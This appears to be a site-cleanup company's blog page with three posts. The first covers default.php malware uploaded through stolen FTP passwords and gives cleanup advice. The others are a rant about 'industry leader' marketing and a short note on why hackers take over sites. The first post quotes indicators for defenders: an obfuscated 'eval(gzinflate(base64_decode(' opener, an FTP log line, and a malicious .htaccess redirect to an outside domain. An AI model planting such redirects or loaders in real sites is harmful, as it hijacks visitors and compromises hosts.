Attack of the default.php files

We’ve been seeing many infected websites that have numerous default.php files “sprinkled” throughout the site.

These files are being used by hackers to infect other websites.

The code inside the default.php files usually starts with:

eval (gzinflate ( base64_decode ("...

The file will usually be either 2,858 or 2,556 in size.

These files are uploaded to the website via FTP.

How do hackers upload files to your site with FTP?

They have stolen your password!

If you have access to your FTP log files, you will see some entries like this:

Sun Jan 13 21:41:48 2013 0 XX.XX.XX.XX 2848 /home/(name of your account)/public_html/default.php b _ i r ftpaccount ftp 1 * c

The ftpaccount shown in the log entry will be the one that has been used by the hackers to upload the default.php files to your site. Whoever is using that account legitimately could be the using the computer with a virus on it that has stolen the passwords.

The default.php files are also used to upload malicious .htaccess files. Those files will have something like this:

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http: //[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

RewriteRule ^.*$ http: //le-guide-thalasso-sainte-maxime. com/wapn.html?h=1415319 [L,R]

We’ve seen various domains inserted into that last line but the format is basically the same: URL/randomname.html?h=(some numbers)

First thing is to change all your passwords: hosting account, FTP, website (WordPress, Joomla or other…). Then DO NOT log back in again until you have scanned all your computers – yes even Macs.

Next, reviewing the log files will show you where on your site the files were uploaded and then you can delete those files. Check your .htaccess files for any code similar to the above. If there was already a .htaccess file in that folder, they have added their malicious redirects. The above lines can simply be removed from your file.

If there wasn’t already a .htaccess file there then the hackers have added one and it can just be deleted.

Again, please run daily virus scans on all computers – daily. When your anti-virus program updates, it typically doesn’t run a full scan. So any updates you received today on your anti-virus program will not detect anything already on your system until you run a full scan. The updates will only protect your computer from the new infections.

With this infection there are typically additional backdoor shell scripts added to the site as well. Those have generally been something using the base64_decode string so you can search your files for that and then further analyze the file to determine if it’s malicious or not.

If you need help cleaning this up, please send me an email at:

Thank you.

If you found this useful, please share it.


“Industry leaders…”

This is going to be somewhat of a rant.

In reading many blogs and websites, many of them in our own industry, we see variations of the term, “industry leading”.

I started doing some research on this and I have some questions.

If you’re a startup, how can you be leading the industry right out of the gates? I started this company back in 2008 and I don’t ever think about calling us industry leaders. We’ve cleaned over 138,000 websites and I don’t think about labeling us as industry leaders.

Even if you started your company years ago, by what standard do you consider yourself “the” industry leader?

Who is the industry leader?

I have no idea. I just know that if everyone is labeling themselves as industry leaders, are we at the bottom? I don’t think so. Our customers don’t think so.

If you look up self-proclamation (self proclaimed industry leaders) on, you’ll see this definition:

describes a legal title that is only recognized by the declaring person and not any recognized legal authority

To me, self-proclamations are worthless.

What do you think?


“Why would hackers want my site?”

This is a question we’re asked all the time.

As I read this article I thought it was one good answer to why hackers want your site:

One comment I have about the above article. It uses the term web servers when they should be saying web sites.

This article provides more insight into the attacks.

Bank DDoS Attacks Using Compromised Web Servers as Bots

When you read the second article, notice the username and password used on the website: admin/admin. We see this frequently.

We have cleaned thousands of websites that are being used in these DDoS attacks on banks. The cybercriminals find a point of entry, exploit it, upload their script files and then coordinate the attack from a remote location.

First line of defense is a strong password.

The next line of defense is to keep your software; WordPress, Joomla, whatever, up-to-date at all times.

If you have any thoughts or comments about this, please share.

Thank you.